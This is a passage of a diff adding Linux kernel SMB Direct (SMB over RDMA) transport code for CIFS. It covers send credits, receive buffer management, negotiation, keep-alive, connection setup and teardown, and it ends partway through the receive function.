++		log_outgoing(ERR, "disconnected not sending on wait_credit\n");
++		rc = -EAGAIN;
++		goto err_wait_credit;
++	}
++	if (unlikely(atomic_dec_return(&info->send_credits) < 0)) {
++		atomic_inc(&info->send_credits);
++		goto wait_credit;
++	}
++
++wait_send_queue:
++	wait_event(info->wait_post_send,
++		atomic_read(&info->send_pending) < info->send_credit_target ||
++		info->transport_status != SMBD_CONNECTED);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_outgoing(ERR, "disconnected not sending on wait_send_queue\n");
++		rc = -EAGAIN;
++		goto err_wait_send_queue;
++	}
++
++	if (unlikely(atomic_inc_return(&info->send_pending) >
++				info->send_credit_target)) {
++		atomic_dec(&info->send_pending);
++		goto wait_send_queue;
++	}
++
++	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
++	if (!request) {
++		rc = -ENOMEM;
++		goto err_alloc;
++	}
++
++	request->info = info;
++
++	/* Fill in the packet header */
++	packet = smbd_request_payload(request);
++	packet->credits_requested = cpu_to_le16(info->send_credit_target);
++
++	new_credits = manage_credits_prior_sending(info);
++	atomic_add(new_credits, &info->receive_credits);
++	packet->credits_granted = cpu_to_le16(new_credits);
++
++	info->send_immediate = false;
++
++	packet->flags = 0;
++	if (manage_keep_alive_before_sending(info))
++		packet->flags |= cpu_to_le16(SMB_DIRECT_RESPONSE_REQUESTED);
++
++	packet->reserved = 0;
++	if (!data_length)
++		packet->data_offset = 0;
++	else
++		packet->data_offset = cpu_to_le32(24);
++	packet->data_length = cpu_to_le32(data_length);
++	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
++	packet->padding = 0;
++
++	log_outgoing(INFO, "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
++		     le16_to_cpu(packet->credits_requested),
++		     le16_to_cpu(packet->credits_granted),
++		     le32_to_cpu(packet->data_offset),
++		     le32_to_cpu(packet->data_length),
++		     le32_to_cpu(packet->remaining_data_length));
++
++	/* Map the packet to DMA */
++	header_length = sizeof(struct smbd_data_transfer);
++	/* If this is a packet without payload, don't send padding */
++	if (!data_length)
++		header_length = offsetof(struct smbd_data_transfer, padding);
++
++	request->num_sge = 1;
++	request->sge[0].addr = ib_dma_map_single(info->id->device,
++						 (void *)packet,
++						 header_length,
++						 DMA_TO_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
++		rc = -EIO;
++		request->sge[0].addr = 0;
++		goto err_dma;
++	}
++
++	request->sge[0].length = header_length;
++	request->sge[0].lkey = info->pd->local_dma_lkey;
++
++	/* Fill in the packet data payload */
++	num_sgs = sgl ? sg_nents(sgl) : 0;
++	for_each_sg(sgl, sg, num_sgs, i) {
++		request->sge[i+1].addr =
++			ib_dma_map_page(info->id->device, sg_page(sg),
++			       sg->offset, sg->length, DMA_TO_DEVICE);
++		if (ib_dma_mapping_error(
++				info->id->device, request->sge[i+1].addr)) {
++			rc = -EIO;
++			request->sge[i+1].addr = 0;
++			goto err_dma;
++		}
++		request->sge[i+1].length = sg->length;
++		request->sge[i+1].lkey = info->pd->local_dma_lkey;
++		request->num_sge++;
++	}
++
++	rc = smbd_post_send(info, request);
++	if (!rc)
++		return 0;
++
++err_dma:
++	for (i = 0; i < request->num_sge; i++)
++		if (request->sge[i].addr)
++			ib_dma_unmap_single(info->id->device,
++					    request->sge[i].addr,
++					    request->sge[i].length,
++					    DMA_TO_DEVICE);
++	mempool_free(request, info->request_mempool);
++
++	/* roll back receive credits and credits to be offered */
++	spin_lock(&info->lock_new_credits_offered);
++	info->new_credits_offered += new_credits;
++	spin_unlock(&info->lock_new_credits_offered);
++	atomic_sub(new_credits, &info->receive_credits);
++
++err_alloc:
++	if (atomic_dec_and_test(&info->send_pending))
++		wake_up(&info->wait_send_pending);
++
++err_wait_send_queue:
++	/* roll back send credits and pending */
++	atomic_inc(&info->send_credits);
++
++err_wait_credit:
++	return rc;
++}
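++/*
++ * Layout built above: sge[0] always maps the SMBD header (padding
++ * omitted for empty messages) and sge[1..n] map the payload pages,
++ * so a request uses at most SMBDIRECT_MAX_SEND_SGE entries in total.
++ */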
++
++/*
++ * Send a page
++ * page: the page to send
++ * offset: offset in the page to send
++ * size: length in the page to send
++ * remaining_data_length: remaining data to send in this payload
++ */
++static int smbd_post_send_page(struct smbd_connection *info, struct page *page,
++		unsigned long offset, size_t size, int remaining_data_length)
++{
++	struct scatterlist sgl;
++
++	sg_init_table(&sgl, 1);
++	sg_set_page(&sgl, page, size, offset);
++
++	return smbd_post_send_sgl(info, &sgl, size, remaining_data_length);
++}
++
++/*
++ * Send an empty message
++ * An empty message is used to extend credits to the peer for keepalive
++ * while there is no upper-layer payload to send at the time.
++ */
++static int smbd_post_send_empty(struct smbd_connection *info)
++{
++	info->count_send_empty++;
++	return smbd_post_send_sgl(info, NULL, 0, 0);
++}
++
++/*
++ * Send a data buffer
++ * iov: the iov array describing the data buffers
++ * n_vec: number of entries in the iov array
++ * remaining_data_length: remaining data to send following this packet
++ * in segmented SMBD packet
++ */
++static int smbd_post_send_data(
++	struct smbd_connection *info, struct kvec *iov, int n_vec,
++	int remaining_data_length)
++{
++	int i;
++	u32 data_length = 0;
++	struct scatterlist sgl[SMBDIRECT_MAX_SEND_SGE - 1];
++
++	if (n_vec > SMBDIRECT_MAX_SEND_SGE - 1) {
++		cifs_dbg(VFS, "Can't fit data to SGL, n_vec=%d\n", n_vec);
++		return -EINVAL;
++	}
++
++	sg_init_table(sgl, n_vec);
++	for (i = 0; i < n_vec; i++) {
++		data_length += iov[i].iov_len;
++		sg_set_buf(&sgl[i], iov[i].iov_base, iov[i].iov_len);
++	}
++
++	return smbd_post_send_sgl(info, sgl, data_length, remaining_data_length);
++}
++
++/*
++ * Post a receive request to the transport
++ * The remote peer can only send data when a receive request is posted
++ * The interaction is controlled by the send/receive credit system
++ */
++static int smbd_post_recv(
++		struct smbd_connection *info, struct smbd_response *response)
++{
++	struct ib_recv_wr recv_wr;
++	int rc = -EIO;
++
++	response->sge.addr = ib_dma_map_single(
++				info->id->device, response->packet,
++				info->max_receive_size, DMA_FROM_DEVICE);
++	if (ib_dma_mapping_error(info->id->device, response->sge.addr))
++		return rc;
++
++	response->sge.length = info->max_receive_size;
++	response->sge.lkey = info->pd->local_dma_lkey;
++
++	response->cqe.done = recv_done;
++
++	recv_wr.wr_cqe = &response->cqe;
++	recv_wr.next = NULL;
++	recv_wr.sg_list = &response->sge;
++	recv_wr.num_sge = 1;
++
++	rc = ib_post_recv(info->id->qp, &recv_wr, NULL);
++	if (rc) {
++		ib_dma_unmap_single(info->id->device, response->sge.addr,
++				    response->sge.length, DMA_FROM_DEVICE);
++		smbd_disconnect_rdma_connection(info);
++		log_rdma_recv(ERR, "ib_post_recv failed rc=%d\n", rc);
++	}
++
++	return rc;
++}
++
++/* Perform SMBD negotiate according to [MS-SMBD] 3.1.5.2 */
++static int smbd_negotiate(struct smbd_connection *info)
++{
++	int rc;
++	struct smbd_response *response = get_receive_buffer(info);
++
++	response->type = SMBD_NEGOTIATE_RESP;
++	rc = smbd_post_recv(info, response);
++	log_rdma_event(INFO, "smbd_post_recv rc=%d iov.addr=0x%llx iov.length=%u iov.lkey=0x%x\n",
++		       rc, response->sge.addr,
++		       response->sge.length, response->sge.lkey);
++	if (rc)
++		return rc;
++
++	init_completion(&info->negotiate_completion);
++	info->negotiate_done = false;
++	rc = smbd_post_send_negotiate_req(info);
++	if (rc)
++		return rc;
++
++	rc = wait_for_completion_interruptible_timeout(
++		&info->negotiate_completion, SMBD_NEGOTIATE_TIMEOUT * HZ);
++	log_rdma_event(INFO, "wait_for_completion_timeout rc=%d\n", rc);
++
++	if (info->negotiate_done)
++		return 0;
++
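++	/*
++	 * Negotiation did not complete; map the wait result to an error:
++	 * 0 from the timed wait means timeout, -ERESTARTSYS means the
++	 * wait was interrupted by a signal, and any other value means the
++	 * negotiation completed but did not succeed.
++	 */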
++	if (rc == 0)
++		rc = -ETIMEDOUT;
++	else if (rc == -ERESTARTSYS)
++		rc = -EINTR;
++	else
++		rc = -ENOTCONN;
++
++	return rc;
++}
++
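++/*
++ * Queue a response buffer that carried no payload on the empty packet
++ * list. These buffers still represent receive credits, so the
++ * post_send_credits work is scheduled so that they can be turned back
++ * into posted receives and credits extended to the peer.
++ */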
++static void put_empty_packet(
++		struct smbd_connection *info, struct smbd_response *response)
++{
++	spin_lock(&info->empty_packet_queue_lock);
++	list_add_tail(&response->list, &info->empty_packet_queue);
++	info->count_empty_packet_queue++;
++	spin_unlock(&info->empty_packet_queue_lock);
++
++	queue_work(info->workqueue, &info->post_send_credits_work);
++}
++
++/*
++ * Implement Connection.FragmentReassemblyBuffer defined in [MS-SMBD] 3.1.1.1
++ * This is a queue for reassembling upper layer payload and presenting it to
++ * the upper layer. All incoming payloads go to the reassembly queue,
++ * regardless of whether reassembly is required. The upper layer code reads
++ * from the queue for all incoming payloads.
++ * Put a received packet to the reassembly queue
++ * response: the packet received
++ * data_length: the size of payload in this packet
++ */
++static void enqueue_reassembly(
++	struct smbd_connection *info,
++	struct smbd_response *response,
++	int data_length)
++{
++	spin_lock(&info->reassembly_queue_lock);
++	list_add_tail(&response->list, &info->reassembly_queue);
++	info->reassembly_queue_length++;
++	/*
++	 * Make sure reassembly_data_length is updated after the list and
++	 * reassembly_queue_length are updated. On the dequeue side
++	 * reassembly_data_length is checked without a lock to determine
++	 * if reassembly_queue_length and the list are up to date; this
++	 * virt_wmb() pairs with the virt_rmb() in smbd_recv_buf()
++	 */
++	virt_wmb();
++	info->reassembly_data_length += data_length;
++	spin_unlock(&info->reassembly_queue_lock);
++	info->count_reassembly_queue++;
++	info->count_enqueue_reassembly_queue++;
++}
++
++/*
++ * Get the first entry at the front of reassembly queue
++ * Caller is responsible for locking
++ * return value: the first entry if any, NULL if queue is empty
++ */
++static struct smbd_response *_get_first_reassembly(struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++
++	if (!list_empty(&info->reassembly_queue)) {
++		ret = list_first_entry(
++			&info->reassembly_queue,
++			struct smbd_response, list);
++	}
++	return ret;
++}
++
++static struct smbd_response *get_empty_queue_buffer(
++		struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++	unsigned long flags;
++
++	spin_lock_irqsave(&info->empty_packet_queue_lock, flags);
++	if (!list_empty(&info->empty_packet_queue)) {
++		ret = list_first_entry(
++			&info->empty_packet_queue,
++			struct smbd_response, list);
++		list_del(&ret->list);
++		info->count_empty_packet_queue--;
++	}
++	spin_unlock_irqrestore(&info->empty_packet_queue_lock, flags);
++
++	return ret;
++}
++
++/*
++ * Get a receive buffer
++ * For each remote send, we need to post a receive. The receive buffers are
++ * pre-allocated on transport establishment.
++ * return value: the receive buffer, NULL if none is available
++ */
++static struct smbd_response *get_receive_buffer(struct smbd_connection *info)
++{
++	struct smbd_response *ret = NULL;
++	unsigned long flags;
++
++	spin_lock_irqsave(&info->receive_queue_lock, flags);
++	if (!list_empty(&info->receive_queue)) {
++		ret = list_first_entry(
++			&info->receive_queue,
++			struct smbd_response, list);
++		list_del(&ret->list);
++		info->count_receive_queue--;
++		info->count_get_receive_buffer++;
++	}
++	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
++
++	return ret;
++}
++
++/*
++ * Return a receive buffer
++ * Upon returning of a receive buffer, we can post new receive and extend
++ * more receive credits to remote peer. This is done immediately after a
++ * receive buffer is returned.
++ */
++static void put_receive_buffer(
++	struct smbd_connection *info, struct smbd_response *response)
++{
++	unsigned long flags;
++
++	ib_dma_unmap_single(info->id->device, response->sge.addr,
++		response->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock_irqsave(&info->receive_queue_lock, flags);
++	list_add_tail(&response->list, &info->receive_queue);
++	info->count_receive_queue++;
++	info->count_put_receive_buffer++;
++	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
++
++	queue_work(info->workqueue, &info->post_send_credits_work);
++}
++
++/* Preallocate all receive buffers on transport establishment */
++static int allocate_receive_buffers(struct smbd_connection *info, int num_buf)
++{
++	int i;
++	struct smbd_response *response;
++
++	INIT_LIST_HEAD(&info->reassembly_queue);
++	spin_lock_init(&info->reassembly_queue_lock);
++	info->reassembly_data_length = 0;
++	info->reassembly_queue_length = 0;
++
++	INIT_LIST_HEAD(&info->receive_queue);
++	spin_lock_init(&info->receive_queue_lock);
++	info->count_receive_queue = 0;
++
++	INIT_LIST_HEAD(&info->empty_packet_queue);
++	spin_lock_init(&info->empty_packet_queue_lock);
++	info->count_empty_packet_queue = 0;
++
++	init_waitqueue_head(&info->wait_receive_queues);
++
++	for (i = 0; i < num_buf; i++) {
++		response = mempool_alloc(info->response_mempool, GFP_KERNEL);
++		if (!response)
++			goto allocate_failed;
++
++		response->info = info;
++		list_add_tail(&response->list, &info->receive_queue);
++		info->count_receive_queue++;
++	}
++
++	return 0;
++
++allocate_failed:
++	while (!list_empty(&info->receive_queue)) {
++		response = list_first_entry(
++				&info->receive_queue,
++				struct smbd_response, list);
++		list_del(&response->list);
++		info->count_receive_queue--;
++
++		mempool_free(response, info->response_mempool);
++	}
++	return -ENOMEM;
++}
++
++static void destroy_receive_buffers(struct smbd_connection *info)
++{
++	struct smbd_response *response;
++
++	while ((response = get_receive_buffer(info)))
++		mempool_free(response, info->response_mempool);
++
++	while ((response = get_empty_queue_buffer(info)))
++		mempool_free(response, info->response_mempool);
++}
++
++/* Implement idle connection timer [MS-SMBD] 3.1.6.2 */
++static void idle_connection_timer(struct work_struct *work)
++{
++	struct smbd_connection *info = container_of(
++					work, struct smbd_connection,
++					idle_timer_work.work);
++
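++	/*
++	 * keep_alive_requested should have been reset to KEEP_ALIVE_NONE
++	 * when the peer responded; if it was not, the previous keep-alive
++	 * exchange never completed and the connection is treated as dead.
++	 */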
++	if (info->keep_alive_requested != KEEP_ALIVE_NONE) {
++		log_keep_alive(ERR,
++			"error status info->keep_alive_requested=%d\n",
++			info->keep_alive_requested);
++		smbd_disconnect_rdma_connection(info);
++		return;
++	}
++
++	log_keep_alive(INFO, "about to send an empty idle message\n");
++	smbd_post_send_empty(info);
++
++	/* Setup the next idle timeout work */
++	queue_delayed_work(info->workqueue, &info->idle_timer_work,
++			info->keep_alive_interval*HZ);
++}
++
++/*
++ * Destroy the transport and related RDMA and memory resources
++ * Need to go through all the pending counters and make sure no one is using
++ * the transport while it is destroyed
++ */
++void smbd_destroy(struct TCP_Server_Info *server)
++{
++	struct smbd_connection *info = server->smbd_conn;
++	struct smbd_response *response;
++	unsigned long flags;
++
++	if (!info) {
++		log_rdma_event(INFO, "rdma session already destroyed\n");
++		return;
++	}
++
++	log_rdma_event(INFO, "destroying rdma session\n");
++	if (info->transport_status != SMBD_DISCONNECTED) {
++		rdma_disconnect(server->smbd_conn->id);
++		log_rdma_event(INFO, "wait for transport being disconnected\n");
++		wait_event_interruptible(
++			info->disconn_wait,
++			info->transport_status == SMBD_DISCONNECTED);
++	}
++
++	log_rdma_event(INFO, "destroying qp\n");
++	ib_drain_qp(info->id->qp);
++	rdma_destroy_qp(info->id);
++
++	log_rdma_event(INFO, "cancelling idle timer\n");
++	cancel_delayed_work_sync(&info->idle_timer_work);
++
++	log_rdma_event(INFO, "wait for all send posted to IB to finish\n");
++	wait_event(info->wait_send_pending,
++		atomic_read(&info->send_pending) == 0);
++
++	/* At this point the upper layer can no longer reach the reassembly queue */
++	log_rdma_event(INFO, "drain the reassembly queue\n");
++	do {
++		spin_lock_irqsave(&info->reassembly_queue_lock, flags);
++		response = _get_first_reassembly(info);
++		if (response) {
++			list_del(&response->list);
++			spin_unlock_irqrestore(
++				&info->reassembly_queue_lock, flags);
++			put_receive_buffer(info, response);
++		} else
++			spin_unlock_irqrestore(
++				&info->reassembly_queue_lock, flags);
++	} while (response);
++	info->reassembly_data_length = 0;
++
++	log_rdma_event(INFO, "free receive buffers\n");
++	wait_event(info->wait_receive_queues,
++		info->count_receive_queue + info->count_empty_packet_queue
++			== info->receive_credit_max);
++	destroy_receive_buffers(info);
++
++	/*
++	 * For performance reasons, memory registration and deregistration
++	 * are not locked by srv_mutex. It is possible some processes are
++	 * blocked on transport srv_mutex while holding memory registration.
++	 * Release the transport srv_mutex to allow them to hit the failure
++	 * path when sending data, and then release memory registrations.
++	 */
++	log_rdma_event(INFO, "freeing mr list\n");
++	wake_up_interruptible_all(&info->wait_mr);
++	while (atomic_read(&info->mr_used_count)) {
++		cifs_server_unlock(server);
++		msleep(1000);
++		cifs_server_lock(server);
++	}
++	destroy_mr_list(info);
++
++	ib_free_cq(info->send_cq);
++	ib_free_cq(info->recv_cq);
++	ib_dealloc_pd(info->pd);
++	rdma_destroy_id(info->id);
++
++	/* free mempools */
++	mempool_destroy(info->request_mempool);
++	kmem_cache_destroy(info->request_cache);
++
++	mempool_destroy(info->response_mempool);
++	kmem_cache_destroy(info->response_cache);
++
++	info->transport_status = SMBD_DESTROYED;
++
++	destroy_workqueue(info->workqueue);
++	log_rdma_event(INFO,  "rdma session destroyed\n");
++	kfree(info);
++	server->smbd_conn = NULL;
++}
++
++/*
++ * Reconnect this SMBD connection, called from upper layer
++ * return value: 0 on success, or actual error code
++ */
++int smbd_reconnect(struct TCP_Server_Info *server)
++{
++	log_rdma_event(INFO, "reconnecting rdma session\n");
++
++	if (!server->smbd_conn) {
++		log_rdma_event(INFO, "rdma session already destroyed\n");
++		goto create_conn;
++	}
++
++	/*
++	 * This is possible if transport is disconnected and we haven't received
++	 * notification from RDMA, but upper layer has detected timeout
++	 */
++	if (server->smbd_conn->transport_status == SMBD_CONNECTED) {
++		log_rdma_event(INFO, "disconnecting transport\n");
++		smbd_destroy(server);
++	}
++
++create_conn:
++	log_rdma_event(INFO, "creating rdma session\n");
++	server->smbd_conn = smbd_get_connection(
++		server, (struct sockaddr *) &server->dstaddr);
++
++	if (server->smbd_conn)
++		cifs_dbg(VFS, "RDMA transport re-established\n");
++
++	return server->smbd_conn ? 0 : -ENOENT;
++}
++
++static void destroy_caches_and_workqueue(struct smbd_connection *info)
++{
++	destroy_receive_buffers(info);
++	destroy_workqueue(info->workqueue);
++	mempool_destroy(info->response_mempool);
++	kmem_cache_destroy(info->response_cache);
++	mempool_destroy(info->request_mempool);
++	kmem_cache_destroy(info->request_cache);
++}
++
++#define MAX_NAME_LEN	80
++static int allocate_caches_and_workqueue(struct smbd_connection *info)
++{
++	char name[MAX_NAME_LEN];
++	int rc;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_request_%p", info);
++	info->request_cache =
++		kmem_cache_create(
++			name,
++			sizeof(struct smbd_request) +
++				sizeof(struct smbd_data_transfer),
++			0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!info->request_cache)
++		return -ENOMEM;
++
++	info->request_mempool =
++		mempool_create(info->send_credit_target, mempool_alloc_slab,
++			mempool_free_slab, info->request_cache);
++	if (!info->request_mempool)
++		goto out1;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_response_%p", info);
++	info->response_cache =
++		kmem_cache_create(
++			name,
++			sizeof(struct smbd_response) +
++				info->max_receive_size,
++			0, SLAB_HWCACHE_ALIGN, NULL);
++	if (!info->response_cache)
++		goto out2;
++
++	info->response_mempool =
++		mempool_create(info->receive_credit_max, mempool_alloc_slab,
++		       mempool_free_slab, info->response_cache);
++	if (!info->response_mempool)
++		goto out3;
++
++	scnprintf(name, MAX_NAME_LEN, "smbd_%p", info);
++	info->workqueue = create_workqueue(name);
++	if (!info->workqueue)
++		goto out4;
++
++	rc = allocate_receive_buffers(info, info->receive_credit_max);
++	if (rc) {
++		log_rdma_event(ERR, "failed to allocate receive buffers\n");
++		goto out5;
++	}
++
++	return 0;
++
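++/*
++ * Unwind in reverse order of allocation; each label below frees what
++ * was successfully set up before the failing step.
++ */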
++out5:
++	destroy_workqueue(info->workqueue);
++out4:
++	mempool_destroy(info->response_mempool);
++out3:
++	kmem_cache_destroy(info->response_cache);
++out2:
++	mempool_destroy(info->request_mempool);
++out1:
++	kmem_cache_destroy(info->request_cache);
++	return -ENOMEM;
++}
++
++/* Create a SMBD connection, called by upper layer */
++static struct smbd_connection *_smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr, int port)
++{
++	int rc;
++	struct smbd_connection *info;
++	struct rdma_conn_param conn_param;
++	struct ib_qp_init_attr qp_attr;
++	struct sockaddr_in *addr_in = (struct sockaddr_in *) dstaddr;
++	struct ib_port_immutable port_immutable;
++	u32 ird_ord_hdr[2];
++
++	info = kzalloc(sizeof(struct smbd_connection), GFP_KERNEL);
++	if (!info)
++		return NULL;
++
++	info->transport_status = SMBD_CONNECTING;
++	rc = smbd_ia_open(info, dstaddr, port);
++	if (rc) {
++		log_rdma_event(INFO, "smbd_ia_open rc=%d\n", rc);
++		goto create_id_failed;
++	}
++
++	if (smbd_send_credit_target > info->id->device->attrs.max_cqe ||
++	    smbd_send_credit_target > info->id->device->attrs.max_qp_wr) {
++		log_rdma_event(ERR, "consider lowering send_credit_target = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++			       smbd_send_credit_target,
++			       info->id->device->attrs.max_cqe,
++			       info->id->device->attrs.max_qp_wr);
++		goto config_failed;
++	}
++
++	if (smbd_receive_credit_max > info->id->device->attrs.max_cqe ||
++	    smbd_receive_credit_max > info->id->device->attrs.max_qp_wr) {
++		log_rdma_event(ERR, "consider lowering receive_credit_max = %d. Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
++			       smbd_receive_credit_max,
++			       info->id->device->attrs.max_cqe,
++			       info->id->device->attrs.max_qp_wr);
++		goto config_failed;
++	}
++
++	info->receive_credit_max = smbd_receive_credit_max;
++	info->send_credit_target = smbd_send_credit_target;
++	info->max_send_size = smbd_max_send_size;
++	info->max_fragmented_recv_size = smbd_max_fragmented_recv_size;
++	info->max_receive_size = smbd_max_receive_size;
++	info->keep_alive_interval = smbd_keep_alive_interval;
++
++	if (info->id->device->attrs.max_send_sge < SMBDIRECT_MAX_SEND_SGE ||
++	    info->id->device->attrs.max_recv_sge < SMBDIRECT_MAX_RECV_SGE) {
++		log_rdma_event(ERR,
++			"device %.*s max_send_sge/max_recv_sge = %d/%d too small\n",
++			IB_DEVICE_NAME_MAX,
++			info->id->device->name,
++			info->id->device->attrs.max_send_sge,
++			info->id->device->attrs.max_recv_sge);
++		goto config_failed;
++	}
++
++	info->send_cq = NULL;
++	info->recv_cq = NULL;
++	info->send_cq =
++		ib_alloc_cq_any(info->id->device, info,
++				info->send_credit_target, IB_POLL_SOFTIRQ);
++	if (IS_ERR(info->send_cq)) {
++		info->send_cq = NULL;
++		goto alloc_cq_failed;
++	}
++
++	info->recv_cq =
++		ib_alloc_cq_any(info->id->device, info,
++				info->receive_credit_max, IB_POLL_SOFTIRQ);
++	if (IS_ERR(info->recv_cq)) {
++		info->recv_cq = NULL;
++		goto alloc_cq_failed;
++	}
++
++	memset(&qp_attr, 0, sizeof(qp_attr));
++	qp_attr.event_handler = smbd_qp_async_error_upcall;
++	qp_attr.qp_context = info;
++	qp_attr.cap.max_send_wr = info->send_credit_target;
++	qp_attr.cap.max_recv_wr = info->receive_credit_max;
++	qp_attr.cap.max_send_sge = SMBDIRECT_MAX_SEND_SGE;
++	qp_attr.cap.max_recv_sge = SMBDIRECT_MAX_RECV_SGE;
++	qp_attr.cap.max_inline_data = 0;
++	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
++	qp_attr.qp_type = IB_QPT_RC;
++	qp_attr.send_cq = info->send_cq;
++	qp_attr.recv_cq = info->recv_cq;
++	qp_attr.port_num = ~0;
++
++	rc = rdma_create_qp(info->id, info->pd, &qp_attr);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_create_qp failed %i\n", rc);
++		goto create_qp_failed;
++	}
++
++	memset(&conn_param, 0, sizeof(conn_param));
++	conn_param.initiator_depth = 0;
++
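++	/*
++	 * responder_resources bounds how many incoming RDMA read
++	 * operations can be outstanding at once; clamp the preferred
++	 * value to what the device supports (max_qp_rd_atom).
++	 */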
++	conn_param.responder_resources =
++		info->id->device->attrs.max_qp_rd_atom
++			< SMBD_CM_RESPONDER_RESOURCES ?
++		info->id->device->attrs.max_qp_rd_atom :
++		SMBD_CM_RESPONDER_RESOURCES;
++	info->responder_resources = conn_param.responder_resources;
++	log_rdma_mr(INFO, "responder_resources=%d\n",
++		info->responder_resources);
++
++	/* Need to send IRD/ORD in private data for iWARP */
++	info->id->device->ops.get_port_immutable(
++		info->id->device, info->id->port_num, &port_immutable);
++	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
++		ird_ord_hdr[0] = info->responder_resources;
++		ird_ord_hdr[1] = 1;
++		conn_param.private_data = ird_ord_hdr;
++		conn_param.private_data_len = sizeof(ird_ord_hdr);
++	} else {
++		conn_param.private_data = NULL;
++		conn_param.private_data_len = 0;
++	}
++
++	conn_param.retry_count = SMBD_CM_RETRY;
++	conn_param.rnr_retry_count = SMBD_CM_RNR_RETRY;
++	conn_param.flow_control = 0;
++
++	log_rdma_event(INFO, "connecting to IP %pI4 port %d\n",
++		&addr_in->sin_addr, port);
++
++	init_waitqueue_head(&info->conn_wait);
++	init_waitqueue_head(&info->disconn_wait);
++	init_waitqueue_head(&info->wait_reassembly_queue);
++	rc = rdma_connect(info->id, &conn_param);
++	if (rc) {
++		log_rdma_event(ERR, "rdma_connect() failed with %i\n", rc);
++		goto rdma_connect_failed;
++	}
++
++	wait_event_interruptible(
++		info->conn_wait, info->transport_status != SMBD_CONNECTING);
++
++	if (info->transport_status != SMBD_CONNECTED) {
++		log_rdma_event(ERR, "rdma_connect failed port=%d\n", port);
++		goto rdma_connect_failed;
++	}
++
++	log_rdma_event(INFO, "rdma_connect connected\n");
++
++	rc = allocate_caches_and_workqueue(info);
++	if (rc) {
++		log_rdma_event(ERR, "cache allocation failed\n");
++		goto allocate_cache_failed;
++	}
++
++	init_waitqueue_head(&info->wait_send_queue);
++	INIT_DELAYED_WORK(&info->idle_timer_work, idle_connection_timer);
++	queue_delayed_work(info->workqueue, &info->idle_timer_work,
++		info->keep_alive_interval*HZ);
++
++	init_waitqueue_head(&info->wait_send_pending);
++	atomic_set(&info->send_pending, 0);
++
++	init_waitqueue_head(&info->wait_post_send);
++
++	INIT_WORK(&info->disconnect_work, smbd_disconnect_rdma_work);
++	INIT_WORK(&info->post_send_credits_work, smbd_post_send_credits);
++	info->new_credits_offered = 0;
++	spin_lock_init(&info->lock_new_credits_offered);
++
++	rc = smbd_negotiate(info);
++	if (rc) {
++		log_rdma_event(ERR, "smbd_negotiate rc=%d\n", rc);
++		goto negotiation_failed;
++	}
++
++	rc = allocate_mr_list(info);
++	if (rc) {
++		log_rdma_mr(ERR, "memory registration allocation failed\n");
++		goto allocate_mr_failed;
++	}
++
++	return info;
++
++allocate_mr_failed:
++	/* At this point, we need a full transport shutdown */
++	server->smbd_conn = info;
++	smbd_destroy(server);
++	return NULL;
++
++negotiation_failed:
++	cancel_delayed_work_sync(&info->idle_timer_work);
++	destroy_caches_and_workqueue(info);
++	info->transport_status = SMBD_NEGOTIATE_FAILED;
++	init_waitqueue_head(&info->conn_wait);
++	rdma_disconnect(info->id);
++	wait_event(info->conn_wait,
++		info->transport_status == SMBD_DISCONNECTED);
++
++allocate_cache_failed:
++rdma_connect_failed:
++	rdma_destroy_qp(info->id);
++
++create_qp_failed:
++alloc_cq_failed:
++	if (info->send_cq)
++		ib_free_cq(info->send_cq);
++	if (info->recv_cq)
++		ib_free_cq(info->recv_cq);
++
++config_failed:
++	ib_dealloc_pd(info->pd);
++	rdma_destroy_id(info->id);
++
++create_id_failed:
++	kfree(info);
++	return NULL;
++}
++
++struct smbd_connection *smbd_get_connection(
++	struct TCP_Server_Info *server, struct sockaddr *dstaddr)
++{
++	struct smbd_connection *ret;
++	int port = SMBD_PORT;
++
++try_again:
++	ret = _smbd_get_connection(server, dstaddr, port);
++
++	/* Try SMB_PORT if SMBD_PORT doesn't work */
++	if (!ret && port == SMBD_PORT) {
++		port = SMB_PORT;
++		goto try_again;
++	}
++	return ret;
++}
++
++/*
++ * Receive data from receive reassembly queue
++ * All the incoming data packets are placed in reassembly queue
++ * buf: the buffer to read data into
++ * size: the length of data to read
++ * return value: actual data read
++ * Note: this implementation copies the data from the reassembly queue to
++ * receive buffers used by the upper layer. This is not the optimal code path.
++ * A better way to do it is to not have the upper layer allocate its receive
++ * buffers but rather borrow the buffer from the reassembly queue, and return
++ * it after the data is consumed. But this would require more changes to upper
++ * layer code, and also needs to consider packet boundaries while they are
++ * still being reassembled.
++ */
++static int smbd_recv_buf(struct smbd_connection *info, char *buf,
++		unsigned int size)
++{
++	struct smbd_response *response;
++	struct smbd_data_transfer *data_transfer;
++	int to_copy, to_read, data_read, offset;
++	u32 data_length, remaining_data_length, data_offset;
++	int rc;
++
++again:
++	/*
++	 * No need to hold the reassembly queue lock all the time as we are
++	 * the only one reading from the front of the queue. The transport
++	 * may add more entries to the back of the queue at the same time
++	 */
++	log_read(INFO, "size=%d info->reassembly_data_length=%d\n", size,
++		info->reassembly_data_length);
++	if (info->reassembly_data_length >= size) {
++		int queue_length;
++		int queue_removed = 0;
++
++		/*
++		 * Need to make sure reassembly_data_length is read before
++		 * reading reassembly_queue_length and calling
++		 * _get_first_reassembly. This call is lock free
++		 * as we never read the end of the queue, which is being
++		 * updated in SOFTIRQ context as more data is received
++		 */
++		virt_rmb();
++		queue_length = info->reassembly_queue_length;
++		data_read = 0;
++		to_read = size;
++		offset = info->first_entry_offset;
++		while (data_read < size) {
++			response = _get_first_reassembly(info);
++			data_transfer = smbd_response_payload(response);
++			data_length = le32_to_cpu(data_transfer->data_length);
++			remaining_data_length =
++				le32_to_cpu(
++					data_transfer->remaining_data_length);
